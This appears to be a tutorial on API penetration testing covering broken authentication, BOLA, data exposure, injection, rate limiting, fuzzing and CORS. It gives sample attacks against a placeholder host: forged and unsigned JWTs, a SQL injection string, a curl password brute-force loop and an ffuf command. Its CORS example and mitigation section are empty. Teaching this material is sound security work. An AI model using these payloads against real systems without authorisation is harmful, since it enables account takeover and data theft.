API Penetration Testing: Common Vulnerabilities & Exploits

Introduction to API Penetration Testing

APIs (Application Programming Interfaces) are critical components of modern applications, enabling communication between services. However, their exposure makes them prime targets for attackers. API penetration testing involves identifying and exploiting vulnerabilities to ensure robust security.

Common API Vulnerabilities

1. Broken Authentication

Weak authentication mechanisms allow attackers to impersonate users or gain unauthorized access.

# Original JWT
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxMjMsInJvbGUiOiJ1c2VyIn0.signature

# Modified JWT (change role to admin)
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxMjMsInJvbGUiOiJhZG1pbiJ0.signature

# Bypassing signature validation
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyX2lkIjoxMjMsInJvbGUiOiJhZG1pbiJ0.

2. Broken Object Level Authorization (BOLA)

BOLA occurs when an API fails to verify user permissions, allowing access to unauthorized resources.

# Request to access another user's data
GET /api/users/456 HTTP/1.1
Host: vulnerable-api.com
Authorization: Bearer user_token_123

# Response (should be forbidden but returns data)
{
  "id": 456,
  "email": "victim@example.com",
  "sensitive_data": "credit_card_info"
}

3. Excessive Data Exposure

APIs may return more data than necessary, exposing sensitive information.

# Request
GET /api/users/123 HTTP/1.1
Host: vulnerable-api.com

# Response (includes sensitive fields)
{
  "id": 123,
  "name": "John Doe",
  "email": "john@example.com",
  "password_hash": "hashed_password",
  "ssn": "123-45-6789"
}

4. Injection Attacks

APIs that process user input without validation are vulnerable to injection attacks like SQL, NoSQL, or command injection.

# Malicious request
POST /api/search HTTP/1.1
Host: vulnerable-api.com
Content-Type: application/json

{
  "query": "1' OR '1'='1"
}

# Response (dumps entire database)
{
  "results": [
    {"id": 1, "username": "admin", ...},
    {"id": 2, "username": "user", ...}
  ]
}

5. Improper Rate Limiting

Lack of rate limiting allows attackers to brute-force endpoints or cause denial-of-service (DoS).

# Script to brute-force login
for password in $(cat passwords.txt); do
  curl -X POST https://vulnerable-api.com/api/login \
    -d "{\"username\":\"admin\",\"password\":\"$password\"}"
done

Exploitation Techniques

1. Fuzzing API Endpoints

Fuzzing involves sending unexpected inputs to discover hidden endpoints or vulnerabilities.

ffuf -w wordlist.txt -u https://vulnerable-api.com/api/FUZZ -H "Authorization: Bearer token"
# Common findings: /admin, /debug, /metrics

2. Parameter Tampering

Manipulating query parameters or request bodies to bypass restrictions.

# Original request
GET /api/orders?user_id=123 HTTP/1.1
Host: vulnerable-api.com

# Tampered request
GET /api/orders?user_id=456 HTTP/1.1
Host: vulnerable-api.com

3. Exploiting Misconfigured CORS

Misconfigured Cross-Origin Resource Sharing (CORS) can allow unauthorized domains to access API resources.

# Malicious HTML

Mitigation Techniques

Conclusion

API penetration testing is critical for securing modern applications. By understanding common vulnerabilities and exploitation techniques, developers and pentesters can build and test robust APIs.

Further Resources

• OWASP API Security Project
• OWASP API Security GitHub
• Burp Suite for API Testing